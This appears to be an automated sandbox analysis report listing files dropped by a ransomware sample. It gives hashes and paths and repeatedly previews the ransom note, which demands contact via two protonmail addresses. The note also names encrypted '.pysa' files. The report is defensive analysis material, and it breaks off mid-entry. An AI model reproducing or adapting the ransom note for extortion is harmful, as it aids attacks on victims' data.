                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.681825778426808
                  Encrypted:false
                  SSDEEP:192:DjDzd3hy5DWKkjRu/jbQg2596pAZ6MKmPGQhGyfSbSZOvqqDu3zIAUJ:nvdAHYurF2HnZ6fmeQhGy+zvquu+J
                  MD5:B4F7974E96817FD9AE48CA7DDB21D08C
                  SHA1:EF71E7B8F6171A0D578617518DC42EF048E33BFD
                  SHA-256:FD5A5C473C16F83C0A7813651256CCB24CF97B4B0193CD3CA19754FAE3FB39A1
                  SHA-512:1BAEDE0627515C878FDC18C72C8A71A305B0CA08D6C3245F036D8EB1C66E947BCC045B73F6DC3AD2621E05F94CCC520DCFCCA6C993FB2EEC103EAED61556EDCF
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
